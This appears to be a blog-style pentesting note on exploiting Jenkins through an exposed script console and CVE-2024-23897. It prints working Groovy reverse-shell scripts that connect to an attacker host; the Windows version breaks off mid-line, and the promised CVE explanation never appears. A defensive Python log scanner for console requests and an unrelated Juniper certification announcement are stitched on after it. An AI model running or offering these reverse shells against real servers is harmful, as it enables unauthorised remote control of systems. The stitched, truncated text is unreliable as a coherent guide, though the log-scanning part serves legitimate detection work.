Exploiting Jenkins / CVE-2024-23897

The script console is often accessible without authentication due to misconfiguration, at http://JENKINS_IP/script

If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).

Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.

For Linux,

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()

For Windows,

    String host="YOUR_IP";
    int port=PORT;
    String cmd="cmd.exe";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
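
A detection-side sketch for the script console path described above, added here as an example and not part of the original post: it scans reverse-proxy access logs for requests to the console endpoints and separates denied requests from served ones. The Combined Log Format, the sample lines, the assumption that Jenkins is served at the site root, and all function names are constructed for illustration.

```python
import re
from collections import namedtuple

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script console endpoints. Assumes Jenkins sits at the site root and the
# proxy forwards paths unchanged; per-node and /manage/ forms are included.
CONSOLE_RE = re.compile(
    r'^(?:/manage)?(?:/computer/[^/]+)?/script(?:Text)?/?(?:\?.*)?$'
)
Finding = namedtuple("Finding", "ip time method path status verdict anonymous")

def classify(method, status):
    """Map a console request to a triage verdict."""
    if status in (401, 403):
        return "denied"            # access control did its job
    if status == 200 and method == "POST":
        return "script-submitted"  # a Groovy script was sent and accepted
    if status == 200:
        return "console-viewed"    # console page served to the client
    return "other"

def scan(lines):
    """Return a Finding for every script console request in the log lines."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not CONSOLE_RE.match(m["path"]):
            continue
        status = int(m["status"])
        findings.append(Finding(
            m["ip"], m["time"], m["method"], m["path"], status,
            classify(m["method"], status),
            m["user"] == "-",      # no authenticated user recorded by the proxy
        ))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2024:10:01:02 +0000] "GET /script HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Feb/2024:10:01:40 +0000] "POST /script HTTP/1.1" 200 9011 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2024:10:05:00 +0000] "GET /script HTTP/1.1" 403 612 "-" "curl/8.0"',
    '198.51.100.9 - admin [12/Feb/2024:11:00:00 +0000] "POST /computer/(built-in)/scriptText HTTP/1.1" 200 120 "-" "curl/8.0"',
    '192.0.2.33 - - [12/Feb/2024:11:02:00 +0000] "GET /job/script-tests/ HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        if f.verdict != "denied":
            print(f.time, f.ip, f.method, f.path, f.verdict, "anonymous" if f.anonymous else "")
```

A served console request with no recorded user is the misconfiguration case from the post; the user field is only meaningful when the proxy itself authenticates requests.
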
Juniper Networks offering free course and certifications

Earn up to FIVE Juniper Networks Associate Certifications for FREE through Juniper Open Learning.
Create an account in Junos Genius to access the learning resources, then complete the learning path and assessment to earn a free voucher.
Offer page : https://learningportal.juniper.net/juniper/user_activity_info.aspx?id=11478
Link to create Junos Genius Account : https://cloud.contentraven.com/junosgenius/signup/register
Make use of it, and happy learning.